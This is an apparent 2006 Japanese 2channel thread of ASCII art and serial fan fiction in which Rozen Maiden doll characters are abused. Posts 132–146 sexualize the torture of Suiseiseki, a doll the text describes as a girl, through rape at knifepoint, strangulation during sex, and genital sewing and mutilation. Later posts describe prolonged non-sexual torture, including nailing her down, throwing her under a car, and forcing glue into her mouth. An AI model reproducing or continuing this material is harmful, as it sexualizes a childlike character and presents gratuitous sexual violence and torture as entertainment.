               |._ハ_.|   ‖ ||| lll
.               ゝ' ゝ'     ___
""""""""""""""""""""""""";; ||l.く/',二二ヽ>l|l デスゥーーーーー!!"""""
                      ;;   |l |ノノイハ))    ;;
                      ;;   |l |ili>o<ノl|   ;;
                      ;;  ノl⊂l_介」⊃   .;;
                      ;;  ミく,,つ,,つ〉ミ   ;;
                      ;;            ;;
                      ;;_          ;;
                      ;;. 、、ヽ        .;;
                      ;;ノリノ))      ∩ ;;
                      ;;々゚ノミ));;i><i∝∝;;
                      ;;゙*";;ζ∽λω ,.,.,.,, ;;
                      ;;(ム!;;⊂)夲/((ノ。;;;ム);;
                      ;;((ミi!;;ζ,,;;);(;;);⊃;;つ;;

131 :名無しちゃん…電波届いた?:2006/07/14(金) 23:00:25
       ____,....
  ,. ‐';ニ"´ニイ:i!:、ヽ:.:`ヽ、_
/.:///:.イ:.|:|:|i:.:ヽ:.、ヽ:、ヽ、
:.:/:/./://:|:.:|:!:|:|i:.:.:゙,:.:.:.リ:.ヽ\
./:.:/:/:.:.//ハ:.:i:.:l:.:.i:.:.:i:.ヽ`:|:!:.:ヽヽ
:.:/.:/:.:./:.l!::.:.ハ:.V:.;、:i:.:.|:.:.ヽ|:.i:.i:.:.',:.゙:,
/l!:/.:.:/|!.|:.:./ハ:',:|:ヽ:、|!:.:.:.ハ:.||:.',:.i:、:',
!|l,:!:.:.:.:|.| |レ/∧:l:メ!:.ヽ:.:|:.|/:.i:.リ:、',:|:.i:.i
:|l.|:.:.:.:|!.:|:.//¬i:.{‐、.:|.ト、:l:|、:.!:.:.i:ヽ|:.|:|
i:.:| |:.:.|l:.:.l/ィ示ヽミ !.メ| 〉ヽ!:|_!:.|:i.:N:.|
:.:.l!:l、.:.:l、:l`ヽ::ノ_, ' リ |i |.,.ィl、.|::!||:.メ:リ
、:.l!.N、:い!.        !く:::ソ } |:.:|/:/
!:i、.i!リ ヽ!         , `~ /|:ノ:/
:.i|:iN  `      .: ノ  /:!レ/′
:、l:|ハ     、____    /::i/'′
小| ヽ     `''ー‐`''  /|/l
:.:トヽ  \       /                      r‐-、r‐-、r‐-、r‐-、
N|`ヽ   ヽ、    , '´      ┌───────┤  ||  ||  ||_..._|‐───────┐
``'''‐- ..,_   iT"´           | ー──────‐ |_...._||  ||_...._|ヽ_,ノ. ─────── |
、_    ``''‐N、           | DEATH NOTE .ヽ_,.ノ|.-‐.|ヽ_,ノ                   |
 `ヽ、      i          | ─────────. `ー' ー‐─────────‐ |
、   `ヽ、   |           |    >>128.          :                      |
、`ヽ、   \  |          | ──────────‐ :. ──────────‐ |
 \ \   ヽ.|ヽ         |                   :                  |
   ヽ ヽ   |  \          | ──────────‐ :. ──────────‐ |

132 :名無しちゃん…電波届いた?:2006/07/14(金) 23:48:32
「ですぅ…ですぅ…」あぁぁたまらないよ翠星石…その口調が今夜も僕を狂わせるよ…「や、やめろです!助けて!嫌ぁっ〜〜!!!」月明りに光る白銀のナイフが今、翠星石の柔らかい胸板を貫いた………

133 :名無しちゃん…電波届いた?:2006/07/14(金) 23:59:53
ハァハァ…翠星石、痛かった?もっと優しく愛してあげるね。…チュパチュパペロ…君の涙も塩辛いんだね…「ふぐぅ…うぅ…痛いですぅ…痛いですよぅ」僕は翠星石の頬を伝う涙を舐めながらナイフを更に突き立てるのだった…

134 :名無しちゃん…電波届いた?:2006/07/15(土) 10:03:31
>>132-133
続きに期待

135 :名無しちゃん…電波届いた?:2006/07/15(土) 22:47:56
ふふふ…翠星石、ドレスをぬがしてあげるよ…「嫌っ!やめてですぅ!」抵抗も空しく全裸にされた翠星石。ペロペロハァハァチュパア〜小さくて柔らかい乳房と乙女の恥部を舌でしゃぶる。…僕のもしゃぶってもらおうかな。翠星石の口元に男根を近付ける。

136 :名無しちゃん…電波届いた?:2006/07/15(土) 22:56:02
「やですぅ!何しやがるです!」…嫌じゃねぇだろ!!…僕は突然怒鳴った。ナイフを喉元にあてがい、脅した。「うぅ…ぐすん…なんでこんな目に遭うです…」

137 :名無しちゃん…電波届いた?:2006/07/15(土) 23:03:35
翠星石…今日から君は僕の“肉人形”だ。メス豚として調教してやる。従順で素直な乙女になる様に…刃向かえば、切り刻んでやる…。

138 :名無しちゃん…電波届いた?:2006/07/16(日) 23:35:52
チュプチュパんぐ…あぁ、出る!ドパァ〜翠星石の口の中は白濁液で溢れている。「ごくっ…んめ〜ですぅ」…ふふふすっかり淫らなメス豚になったな…。三ヶ月も毎夜調教した甲斐があったものだ。

139 :名無しちゃん…電波届いた?:2006/07/16(日) 23:54:47
そろそろ仕上げにかかるとしよう…。「ご主人様ぁ〜おまんまんして欲しいですぅ…ハァハァもう我慢出来ね―ですぅ!」ヌプ…パンパンパン…「あ、あん!あん!気持ちいいですぅ!」そして僕は正常位で交わりながら、両手を翠星石の首にかけ、一気に締め上げた。

140 :ローゼン:2006/07/17(月) 00:13:14
「うぐぅ!く、くるし…ですぅ!」翠星石の口から唾液が垂れている…そして動かなくなった。真夜中の室内を緑色の美しい発光体が浮遊している。僕はローザミスティカと呼ばれるそれを手に取って呟いた…次こそはアリスを…何故なら僕は人形師なのだから…

141 :名無しちゃん…電波届いた?:2006/07/17(月) 17:54:06
    /:: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: ヽ
   /:: :: :: :: :: :: :: :: :: :: :: :: :: ::ハ:: :: :: :: :: :: :: :: :: :ヽ
   /:: :: :: :: :: :: :: :: :: :: :: :: :: :/ l:: :: ,:: :: :: :: :: :: :: :ヽ
  /:: :: :: :: :: :: :: :: :: :: :: :: :: /  l:: ::l ヽ:: :: :l:: :: :: :: :l
  |:: :: :: :: :: :: :: l:: :: ::/l:: : /   |:: :| ヽ:: :::l:: :: :: :: :l
  |:: :: :: :: :: :: :: |:: : :/ |:: /    l:: |  ヽ:: ::l:: :: :l:: ::l
  |:: :: :: :: :: :: :: |:: /_|:/__ゝ l: | 、_ヽ:: |ヽ:: |:: ::l
  |:: |:: /:|:: l:: :: |:/  〃      l:|   `ヽ|‐l:: l:: ::l
  |:: |:/:/|::/l:: ::l    _      l   _ ヾ |::l::l:::l
  |::/:: :l   l:: :| 。rz====ミ、   ` r===ミ  |/::ll::l
  |/ l:: :ヽ  l::| C              つ|::/ |:l
    l:ハ:: ヽ-ヾ :::::::::        、   :::::::l |/  リ  
      ヾl::l、:\ o               ol 
       ヾ ヽハヽ、             イ    
         7 。 、:::;;; c-〜っ_,, ,< o  痛いよぉ・・・
 ⌒⌒ヽ      彡`';:; l l===ュヽ                 
 、  ) ̄} ̄ ̄ ̄ ̄ ̄ヾ ;; |、,|:::/| /      
、_人_,ノ⌒)}─┐    .,,;:':;}#;\∬;;;-'/  | (
  _,,ノ´  └───;イ;゚;'∬:∬     j/
r‐'´ ブチッ…ブチブチ…','/;;∬∬∬   /ヽ  
    /   ヽ   ::ヽ       l::::ヽ、
   /      ヽ    ヽr-  -‐ l::::ヽヽ   

苺ましまろの伊藤千佳ちゃんを虐殺するスレ
http://ex11.2ch.net/test/read.cgi/campus/1152855383/

142 :名無しちゃん…電波届いた?:2006/07/21(金) 00:15:22
ある晩夢の中で翠星石を見たので。こっそり後をつけてみた。

「あいつどこに行くつもりだ?確かこっちには…」

そう、こっちに行くと、あいつが「チビ樹」と呼んでる僕の樹があるはずだ。

いた。
翠星石が僕の樹の前で何かやっている。

なんとドレスをまくり、自分の股間をチビ樹に押し付けながら腰をくねらせていた
早いリズムで小刻みにハッハッと甘い息を出し、何かに取り付かれたようなうつろな表情で
ひたすらこすり続けていた

「ああ〜チビ人間チビ人間、イクですイクです!もうイッちゃいますですぅ〜っ!!」

ぷっしゃああああっ!!!

翠星石はそう叫びながら体をガクガク震わせて、
僕の樹に潮を噴いた。
僕の樹の周りに、むあ〜っと湯気がたつのが見えた。

翠星石は顔をほてらせたままグッタリとしていた。

そんな翠星石を見ていたらムカッ腹が立ってきた。

あの性悪人形め、どうりで最近、朝になるとビンビンに勃ちすぎると思った。
毎朝真紅たちにバレないよう処理するの大変なんだぞ?
もしバレたら姉ちゃんがまた「思春期の男の子は云々」とかほざくに決まってる!

143 :名無しちゃん…電波届いた?:2006/07/21(金) 00:16:06
「はぁ〜…気持ち良かったですぅ…」
イッてしまった後、もうろうとしていた翠星石だったが、意識がもどったようだ。

「ふぃ〜そろそろ帰るかですぅ……っ?!」

起き上がろうとしたが起き上がれない。
何とか動かない手足の方を見れば、なんと、肘と膝のところで腕と脚が固定されているではないか。
今の翠星石の状態は、さながら蛙のようだった。
しかも下半身はスカートをめくられ下着も着けない丸出しの"おっぴろげ"状態だった。

「いやあああっ!な、何です何々ですかぁ〜??」

「何だ起きたのか」

「ッ!!?ち、チビ人間!こ、こ、これはどういうことですか!さっさと解きやがれです!」

「うるせえ!人の夢の中で小便まき散らしやがって!しかも僕の樹をズリネタにしてオナりやがって!」
「な、何を馬鹿なことをほざきやがるですか!この翠星石がそんなはしたない事をするわけがねーです!」
「ああ〜チビ人間チビ人間、イクですイクです〜」

「!!!………とんでもないゲス野郎です!生かしちゃおけねーです」
「そんなこと言える立場だと思うのか?」

「どうだ、動けるものなら動いてみろ。まあ無理だけどな」
「うくっ…す、翠星石をどうするつもりですか」
「なに、すぐ帰してやるさ。ただその前に」
そう言ってポケットから取り出したのは裁縫セット。
意外な物を見て戸惑う翠星石。
「そ、それで何をするですか?」

144 :名無しちゃん…電波届いた?:2006/07/21(金) 00:17:14
「決まってるだろ?二度と僕の夢でオナニーできないよう…(ニヤリ)……去勢するのさ」
そう言い放つなり僕は針に糸を通した。
そして翠星石の股間の前にかがみこみ、「裁縫」を行った。

まずはマチ針だ。こいつは裁縫をするとき布と布がズレないよう留めるのに使う。
僕はおもむろに翠星石の人形とは思えないほどリアルなビラビラに突き刺した。

「ぎぃやああああっ!!!」
翠星石が泣き喚くがマチ針はその役目を果たし、はずれることはない。
次に糸を通した縫い針で翠星石のワレメを縫い上げた。
ワレメに針を刺し、糸をくぐらす度に翠星石が
「ぎぃやぁあっ!!」「ひぃぃぃぃっ!!」「うぎぃぃぃっ!!」
とか喚くが無視した。
ワレメを完全にふさいでしまえば、もう小便をまき散らされることもないからだ。

「うっうぐっ…ぐえ…」
鳴咽をもらすものの泣き叫び疲れたのかジタバタしなくなったな。
さてワレメも縫い上げたことだし、最後の仕上だ。
僕は翠星石の縫い上げたワレメからピョコンと顔を出してる「豆」をつまんだ。

「い゛っ!ひぃあっ!」

何だ、まだ感じてんか、こいつ?まあいいさ。それも今日で最後さ。

145 :名無しちゃん…電波届いた?:2006/07/21(金) 00:18:00
僕は翠星石の身体で最も繊細かつ敏感な部分である「豆」の付け根に、しつけ糸をまいた。
糸が敏感なところを刺激し、かつ血行もとめたせいだろう。

「豆」が徐々に肥大化してきた。

ヴツン!

「い゛あ゛ぎいああはあああっっっ!!っぁぁぁっっ!?!」

翠星石のオッドアイの眼が飛び出さんばかりに見開かれ、舌はちぎれんばかりに口から飛びだし、目、鼻、口をとわず、涙腺から表皮から肛門まで体中の穴という穴から、あらゆる粘液がまき散らされた。

当然だろう。少女の体で最も繊細かつ敏感な器官が僕の手にした裁断用鋏で永遠に失われたのだから。

もうこれで彼女が僕の夢の中で快楽にふけることは二度とないだろう。
僕は変わりはてた翠星石をあとにし、
振り返らずに現実世界に戻るのだった。

END

146 :名無しちゃん…電波届いた?:2006/07/21(金) 00:19:23
「ですぅ…ですぅ…」
あぁぁたまらないよ翠星石…その口調が今夜も僕を狂わせるよ…
「や、やめろです!助けて!嫌ぁっ〜〜!!!」
月明りに光る白銀のナイフが今、翠星石の柔らかい胸板を貫いた………
ハァハァ…翠星石、痛かった?もっと優しく愛してあげるね。
…チュパチュパペロ…君の涙も塩辛いんだね…
「ふぐぅ…うぅ…痛いですぅ…痛いですよぅ」
僕は翠星石の頬を伝う涙を舐めながらナイフを更に突き立てるのだった…
ふふふ…翠星石、ドレスをぬがしてあげるよ…
「嫌っ!やめてですぅ!」
抵抗も空しく全裸にされた翠星石。
ペロペロハァハァチュパア〜小さくて柔らかい乳房と乙女の恥部を舌でしゃぶる。
…僕のもしゃぶってもらおうかな。翠星石の口元に男根を近付ける。
「やですぅ!何しやがるです!」
…嫌じゃねぇだろ!!…僕は突然怒鳴った。ナイフを喉元にあてがい、脅した。
「うぅ…ぐすん…なんでこんな目に遭うです…」
翠星石…今日から君は僕の“肉人形”だ。メス豚として調教してやる。
従順で素直な乙女になる様に…刃向かえば、切り刻んでやる…。
チュプチュパんぐ…あぁ、出る!ドパァ〜翠星石の口の中は白濁液で溢れている。
「ごくっ…んめ〜ですぅ」
…ふふふすっかり淫らなメス豚になったな…三ヶ月も毎夜調教した甲斐があったものだ。
そろそろ仕上げにかかるとしよう…。
「ご主人様ぁ〜おまんまんして欲しいですぅ…ハァハァもう我慢出来ね―ですぅ!」
ヌプ…パンパンパン…「あ、あん!あん!気持ちいいですぅ!」
そして僕は正常位で交わりながら、両手を翠星石の首にかけ、一気に締め上げた。
「うぐぅ!く、くるし…ですぅ!」
翠星石の口から唾液が垂れている…そして動かなくなった。
真夜中の室内を緑色の美しい発光体が浮遊している。
僕はローザミスティカと呼ばれるそれを手に取って呟いた。
…次こそはアリスを…何故なら僕は人形師なのだから…

147 :みづ ◆Cry/UsOQOQ :2006/07/21(金) 00:20:01
いみふだお(ノ゚O゚)ノ


148 :名無しちゃん…電波届いた?:2006/07/21(金) 00:25:01
「やめろですぅ、チビ人間!」
「あぁ!なんか言ったか性悪人形!」
コン!コン!
「ヒィィィィ!右手が動かないですぅ、やめてくれですぅ!」
「あぁ!うるせぇよ!お前、少しは反省しろよ!俺の部屋汚しといて、
 翠星石はやってないですぅだと、ふざけんな!お前しか家にいなっかっただろうが!ばればれ!」
コン!コン!コン!コン!コン!コン!
翠星石の左手、右足、左足が釘で床に打ち付けられる。もちろん血はでない。所詮は人形。
「痛いですぅ、翠星石は反省したです。だからやめろです、チビ人間」
「まったく反省してないな、ジャンクが!」
ブリュ、ブリュ、ブビッ、ブバッ!
ブリュリュウウウウウウウウウウウウウウウウウ!!!!!!
「やめろです、くさいです。何しやがるですかペッ、ぺっ」
身動きがとれない翠星石は顔にウンコをされてしまった。
「はぁぁぁ、すっきりした。なに吐き出してんだよ、ジャンク!喰えよ!」
「いやですぅ」
「あぁ!」
ゲシッ!
腹を踏まれた。
「ツッッッッッッッッ!」
床が水浸しに・・・
「血はでねぇのに、小便はでるのかよ。きったねぇ。これでもくらいな!」
「やめるです、チビ人間!お願いだからやめて・・・」
「だが、断る!」
ゴン!
腹部に五寸釘が打ち込まれる。

「チッ、気絶しやがったか・・・まぁいい、こんど何かしたらこの程度じゃすまさんぞ!」
パタン
ドアが閉まる。
部屋には床に打ち付けられ小便まみれのジャンクと化しか翠星石がさびしく取り残された。

149 :名無しちゃん…電波届いた?:2006/07/21(金) 00:25:48
プゥッ!
「くさいです!空気を入れ替えるです!」
バカッ!
翠星石が眠っていたカバンが開く。
パタパタパタ。手を振って空気を入れ替えているようだ。
「ふぅ、これで大丈夫です」
そういったとき見ていたこちらに気づいたようだ。

「お前、屁こいたろ」
「気、気のせいですぅ。翠星石は屁なんかしないですよ、めがね」
「音したぞ」
「さ、さっとねるです」
グイ!
「い、痛いです、離しやがれです!」
カバンを閉じようとしていたので手を掴みひっぱりだす。

「嘘はよくないな!」
ドゴッ!
床に叩きつける。
「ギャッ!」
ドス!
腹に足がめり込む。踏みつけられているようだ。
「やめるです。翠星石はなにもしてないで」
「まだ言ううか!」
ドゴ、ヂギッ、ベキャ、コローーーン。
踏みつけられて部品がはずれたようだ。
「ヒギャァァァァァァァァァァァァァァァ!翠星石が悪かったです。もうやめるです。痛いです!」
「あれなにもしてないんじゃ?」
ドゴッ!
「ヒグッ!」

今夜も長くなりそうだ。

150 :名無しちゃん…電波届いた?:2006/07/21(金) 00:27:11
「おーい、真紅!真紅どこいったー?」
ジュンは先ほどから姿の見当たらない真紅を探していた。
鞄の中を開けてもいない。どこへ行ったんだ?
と、そこへ翠星石がやってきた。
「なにしてるですか?」
「真紅を探してるんだ。お前見てないか?」
翠星石はリビングにいたので、一緒にいたかもしれないと思い尋ねてみた。
「真紅なんて見てないですよ。話相手が欲しいなら翠星石がなってやってもいいですよ」
「馬鹿言え、お前となんて話すことあるか。真紅の手掛かりが掴めないんじゃ用無しだ。戻っていいぞ」
その言葉にしょんぼりする翠星石。最初からジュンと一緒にいたいためにやってきたのだ。
それなのにジュンのこの態度。翠星石は逆上した。
「どうして真紅じゃなきゃダメですか!あんな子の代わりくらい翠星石にも勤まるです!」
「『あんな子』だと?お前ごときに何が分かるんだ!」
ジュンにとって真紅は真紅でしかない。その他の何物にも例えることは許されないのだ。
切れたジュンは翠星石を廊下に放り投げた。壁に思いっきりぶつけられる翠星石。
「痛々・・・なにしやがるですか!」
ドアを開けて体を半分出したところでジュンがドアを閉めた。
「っぐえ!」
体を半分挟まれてしまった。
「勝手に入るな!糞人形!」
「うう・・・痛いですぅ・・・」
「前々からお前はウザかったんだよ。勝手に契約させて勝手に住み着いてこの態度!ふざけるな!」
そう言って翠星石の顔をボコスカ蹴りまくるジュン。
「や、やめるですジュン!翠星石は・・・ジュンのことを思って・・・」
「糞人形に気遣って貰うほど愚かじゃないんだよ!」
ジュンはドアを開け、挟まっていた翠星石を掴み、窓に思いっきり投げつけた。
「きゃあ!」
さらに押入れから出してきた釘バットで翠星石を殴打する。
「この!なにが!翠星石だ!ふざけた名前しやがって!そんなクズが真紅のことを『あんな子』呼ばわりするな!」
「痛い痛い!もうやめてですぅ!お願いですぅ!」
「はあはあ・・・」
息を荒くしたジュンは翠星石の胸座を掴んで自分の顔の前にまで持ってきた。

151 :名無しちゃん…電波届いた?:2006/07/21(金) 00:29:36
「お前みたいなやつ捨ててやる!」
ジュンは窓を開けるとあらん限りの力を振り絞って投げ捨てた。
家の前の道路へ一直線に叩きつけられる翠星石。そこへたまたま通りかかった車がそれを踏み潰していった。
それを憤慨した表情で見つめるジュン。やがて翠星石が動かなくなったことを確認すると窓を閉めて、ベットに座り込んだ。
と、ドア越しに声が聞こえてきた。
「ジュン、紅茶を入れて頂戴」 「・・・今すぐ入れるよ」
ジュンは薄く微笑みながらドアを開けた。 それから夜になった。
目が覚めた翠星石は瀕死の状態で必死にリビングの明かりが見える庭まで這いずってきた。
優しい家庭の明かりだ。声が聞こえる。
『あれ?翠星石がいないのー』
『翠星石?誰かしら?』
『さあ?誰のことだ?変なこと言うなよ雛苺』
『うゆ?よく考えたら雛苺も知らないのー』
その中に翠星石のいる場所はなかった。
彼女はそこに蹲り、泣いた。
ボロボロのドレスの裾を引きずりながら、それでも翠星石は
まだ自分を受け入れてくれる一抹の希望を求めて玄関に向かう。
車に轢かれたときに左脚をほぼ完全にタイヤで踏み砕かれ、左の足首は
千切れかかってぶらぶらしている。立ち上がることすらままならない。
スカートをめくり、脚の惨状を目の当たりにした翠星石はオッドアイを
泪で一杯に満たす。「うぅ、蒼星石..助けてほしいですよ..このままでは
翠はジャンクになってしまうですよ..ううぅ」
泣きながら、玄関に這いずって来た翠星石は、ドアノブに手をかけようと
必死の抵抗を試みるが、片足だけでは立つことも出来ず、呼び鈴すら手に届かない。
這い蹲りながら両手をバタつかせてドアを叩く翠星石。
『なんかお外で音がするのー』雛が玄関の異変に気付くが、ジュンは
「今日は風が強いからな。玄関も立て付けが悪くなったんだな」
と知らぬそぶりだ。(あの性悪悪魔人形め、轢かれてもしぶとく生きてやがる)
「しょうがないな、ちょっと玄関直してくる」そう云いつつジュンは一旦2回へ上がる。
工具を取ってくるフリをして、2階の窓から翠星石の鞄を投げ捨てた。
何食わぬカオでジュンは玄関へ向かう。
扉を開くと、案の定、泣きじゃくりボロボロ、満身創痍の翠星石。

152 :名無しちゃん…電波届いた?:2006/07/21(金) 00:32:59
「ち、ちび人間..よくもこんな仕打ちしやがったですぅ..
お前なんかもうマスターでもミーディアムでもなんでもないですぅ!
お前こそ悪魔ですぅ!翠星石を、翠星石を、よくもこんな目に..えぐっ えぐっ」
ジュンはそ知らぬ顔で、サンダルを履いた足で、襤褸切れと化した
ヘッドドレスを被った翠星石の頭を強く踏みつけた。
「強がってんじゃねーよ!え?ウチに入れて貰いたいくせにさ!
何度も玄関叩きやがって。そんな減らず口を叩いているうちは
絶対入れてやるもんかよ!」グリグリとサンダルで翠星石の顔面を玄関の
踏み石に摺りつける。翠星石は言いようのない悲しさで胸が一杯になった。
真紅が信頼するマスター。頼りないけど、結構イイ奴だと思っていたのに。
どうして、どうして...
「そうだ。お前なんかこうしてやるさ!」そう云うとジュンは先ほど庭に落とした
翠星石の鞄を持ってくると、鞄を力一杯、翠星石の両足に叩き付けた。
『あぐぅっつ!あぐううっつ!い、いいたいですぅ!何するですぅ!
ローゼンメイデンにとって命よりも大切な鞄を..よりにもよって
鞄で叩くなんて非道いですぅ!痛いですよぉ!』
轢かれた左脚は完全に粉々になり、残る右足も膝関節から下がほぼ壊滅した。
文字通り、両足を失った翠星石は愕然とする。
『ううぅぅ!す、す、翠星石はジャンクになってしまったでsぅ』
「ハァ?寝言云ってんじゃねーよ!お前なんてもともと、真紅や水銀燈に比べりゃ
当の昔からジャンクみたいなもんじゃねーかよ!この性悪毒舌人形!
今までお前に散々虐められた雛苺だって、お前のことをどれだけ嫌っていたか、
わからないだろう!水銀燈に襲われたとき、僕がどんな気持ちで契約してやったと思ってるんだよ!
思い上がるな!このローゼンメイデンワースト1の駄作ゴミ人形!」
凄まじい形相で怒るジュンは、ボロボロの翠星石のスカートを引きずって
路地から車道の真ん中にやってきた。中央のマンホールの蓋をこじ開けると、
その穴の中に翠星石のかつてはチャームポイントであった、
今では毛羽立ってボロボロの二股お下げ髪を投げ入れる。
そして、髪だけを放り込んだマンホールに蓋をする。
重い蓋によってお下げ髪を固定された翠星石はじたばたもがいても逃れようがなかった。

153 :名無しになりきれ:2006/07/21(金) 01:06:54
「どうだ、さっきは運良く助かったみたいだが今度は逃げられないさ。
何度も車につぶされればいい。ここは大型トラックもバンバンくるからな。
さあ何日五体満足でいられるかな。おっと、もう脚が潰れたから五体満足じゃないんだったよなぁ!」
『こ、この鬼畜ちび人間!いい加減にするですぅ!
どこまで性根が腐りきっているですか!さっさと蓋を開けて髪を放すですぅ!
この髪は、この髪はお父さまのお手製の、翠星石の命ですぅ!
これ以上穢すのは許さないですぅ!』
マンホールの蓋でおさげ髪を固定された翠星石は、下半身をじたばたさせながらも
依然として憎まれ口での抵抗をやめない。とはいえ、片足を砕かれ、鞄を破壊され、
既に薔薇乙女としての自尊心は満身創痍、この台詞も自我を水際で維持する
最後の抵抗なのだろう。しかしジュンには、この期に及んでもまだ止まない
一段上から見下すような翠星石の言い回しが一層、癇に障るのだ。
「いい加減煩いのはおまえのほうなんだよ!前っから気に入らなかったんだ!
お前のその『ですぅ』と、何かにつけて鼻につく、その命令口調!
何様のつもりなんだよ!ヒトを見下すその言い方、こんどこそ封じ込めてやる!」
逆上したジュンは何度も翠星石の口元を踵で踏み付けた。それだけでは飽き足らず、
玄関から槌を持ってくると、力任せに鼻から口元を何度も打ち据えた。
『ひぐゥう!ひぐゥウ!はぐぅ!ぐふぅウ!やめ..ぐふっ!ひぐぅうう!』
「はぁはぁはぁはぁ...」翠星石の顎に罅が入りはじめたところで
ジュンは一旦腰を下ろすと、ポケットからチューブ入りの接着剤を出し、
キャップを開けて、それを翠星石の壊れかけた口元に近づけた。
『こ、この期に及んで何をするですか!こ、こんな酷い...ドールの命より大事な
顔を辱めるなんて鬼畜以下の所業ですぅ..えぐっ!えぐっ!蒼星石..お父様..
へぐっ!へぐっ!そんなものたべたくないですぅ!やめろですぅ!』
相変わらずの『ですぅ』口調に、いい加減堪忍袋の緒が切れたジュンは、
翠星石の口をペンチでこじあけると無理矢理、チューブを口の中に捩じ込み
接着剤をゆっくりと口の中へ注入していった。

154 :名無しになりきれ:2006/07/21(金) 01:08:01
『ひぃぃぃぐぐううぅぅぅぅぅぅぅぅぅ!うぐぐぐふぅひぐぐぐぅぅ』
ジュンは一層力を込めて、チューブの内容物を一気に全て流し込んだ。
胃、食道、そんな概念は人形にはないのだろうが、尋常ならざる異物を大量に
食べさせられた不快感は本物だ。翠星石は既に言葉にならないうめき声をあげ、
もがき苦しみのたうちまわった。
『ぐおぅんなぁ、びどいごぉとを、よぉぐもぉ、ぶおぅまえぇ、ぶゅるさないでずぅ!でずぅ!でずぅブヘッ!』
はははは!これでお得意の『ですぅ』節もロクに喋れなくなったなあ!
粘ったクチで、そのへらず口、叩けるモンなら叩いてみろよ!」
そのまま槌で打ち据えて、顎を完全に壊すことも出来れば、
猿轡で口を封じることもたやすいが、ジュンは敢えて翠星石の口を壊さず、
喋りたくても思い通りに喋れないもどかしさで責める方法を選んだ。
『びどい、びどいでずぅ!ぐぉんな、ぐぉんなごどお、なんべ、
ぶジュブ、ぶジュブ、ぼぅじで、ごぉんなごぼ、ずるでずぅ!
だずげで、だずげでぼじいべずよぅ ぞうぜいぜぎぃ...』
翠星石はオッドアイをナミダで一杯に満たして、マスターであったはずの
この少年の狂気の虐待を、何故、何故、なんで、の一心で疑いつつも、
現実に自分が晒されているこの仕打ちを呪い、憎み、慟哭した。
しかし、粘った口腔のために、もう翠星石は泣き叫ぶことも出来なくなっていた。
「ヘッ!こんなミドリのドレスを被ったゴミが、よく薔薇乙女なんて
ほざいていたもんだよな!何が『さっさと契約しやがれですぅ』だよ!
ニンゲンに作られた分際で、ニンゲン見下すような台詞ばかり吐きやがって!
本当は弱々しく、臆病で、人見知りのクセに、そんなテメェの内面隠すために
そんな憎まれ口かよ?おまえのその物言いが、
僕や雛苺をどれだけ傷つけたと思ってるんだ!
サ.イ.テ.ー!のローゼンメイデンだよ、お前はさ!」
ジュンは再び踵で翠星石の胸を何度も踏みつけ、蹴り飛ばし、
「こんなゴミ人形に、不似合いなんだよ!」と、チャームポイントだった
ヘッドドレスを剥ぎ取って投げ捨てた。もう、髪も衣裳もズタ襤褸になり、
ジュンの容赦ない物言いにより精神面もズタズタにされつつあった。

155 :名無しになりきれ:2006/07/21(金) 01:09:03
「ジュン!何をしているの?」その声を聞いて、翠星石はやっとこの地獄から
救われる思いがした。真紅だ。異変に気付いたのか、玄関から出て来て
ジュンのもとへ向かってきた。
「何だよ、悪いけど、僕はこの糞人形に恨みがある。雛苺だってそうだ。
おまえだって、このクソミドリが雛のおやつを何度となく横取りしたの、
見ていただろ?真紅の鞄にわざと落書きして、雛のせいにしたり、
こいつはしょっちゅうだ!それでしまいには、
『おまえの陰気な性格とおばか苺のおダメぶりを直したいからですぅ』
などとほざきやがる!夢の庭師だぁ?ふざけるな!このクソミドリのゴミ人形!」
狂気の形相で翠星石を蹴り飛ばすジュンと、ぐふぅ、ふぐぐふぅ、と呻く翠星石。
それを淡々とした目つきで凝視する真紅。
しかし、意外にも真紅が翠星石へと助けの手を差し伸べる気配は全くない。
それは翠星石にとって、更なる残酷な境遇への入り口を仄めかすものだった
マンホールの蓋でおさげ髪を固定され、接着剤を呑みこまされて
活舌の自由を奪われ涎を垂らしながらのたうちまわる翠星石を、
真紅は冷やかに眺めていた。絶えることのないジュンの虐待に
救いの手を差し伸べることもなく、時折、憐憫の情と
どこか下賤なモノを忌むような仄かな不快感の入り混じった眼差しで
翠星石を凝視し続ける。
「......ジュン。あなた、そこまで....」
溜め息とともに、しかしジュンの所業にさして呆れるわけでもなく、
冷静に真紅は語り始めた。

156 :名無しになりきれ:2006/07/21(金) 01:10:28
「.....確かにこの子は人見知りの反面、自らの精神の脆さと寂しさを
ああいう態度で跳ね返すクセがあったから、ジュンとはあまり相性は好くないのではと
思っていたのだけど..ジュン、そして雛苺、そこまでこの翠星石に不快な心地を
させられていたとは私も想像できなかったわ。でも、私も『夢の庭師』である
彼女をジュンと共存させることで、あなたの精神状態が癒されるのではと思ったの。」
「しかし、あなたは自分の力で立ち上がることが出来るようになった。
既に『夢の庭師』の手助けも要らない。強くなった貴方に、無用の負担を架けて
寄りかかっていたのは私たち薔薇乙女のほう。貴方は間接的なものも含めて
3体と契約を結んでいる。その負担が、かえって自律しようとしているジュンの
足かせになっていることに気がついたの。既に私たちはジュンにとってのヤドリギでしかない。
水銀燈が、決してあの病室の少女と契約を掬ばない理由がやっとわかったわ。」
瞑想するようにゆったりと語りかける真紅。ジュンは翠星石を足蹴に虐待する動作を
ふと止めて聞き入った。
「翠星石、あなたはこの時代に覚醒してミーディアムに恵まれなかったところを、
ジュンが拾い手を差し伸べたようなものなの。わかる?
そして私と同様に、ジュンのヤドリギでしかない。あなたは本来、『夢の庭師』として
ジュンの精神的自立を補助してやるべきだった。しかし結局、あなたはみずからの
脆い精神と臆病な自尊心を、ジュンにぶつけて雛苺を苛める幼稚な反動行為によって
補完するような存在に成り果ててしまった... ... ... ... ... な ん て、つ ま ら な い ... !
あなたの薔薇乙女としての誇りは何?」
違う、ちがうのですぅ!わヵってくださいですぅ、翠星石は心から血を流すような心地で
そう叫びたかったが、接着剤が乾燥し、より粘りを増した口腔は、その本心の吐露を許さなかった。
『ずぉ、ずぉんなぁ・・ガハッ! ぐふぅ、ふぐぐふぅ、ぢ、ぢじがうべずぅぅぅ!
ずズグハッ!ぶずいぜッぜぎぃ ばはッ ずぞぉんなぁ ずぅもりsぃは・・グゲハァッ!』

157 :名無しになりきれ:2006/07/21(金) 01:12:41
醜い翠星石のモノローグを許すジュンではない。
「せっかく誇り高い真紅が話しかけてやってんだ!汚らしく喋るなよ!ゴミドリ!クソミドリ!」
翠星石の胸を、腹を、コルセットが砕けるほどに激しく蹴り飛ばし、口元を踵で踏みつける。

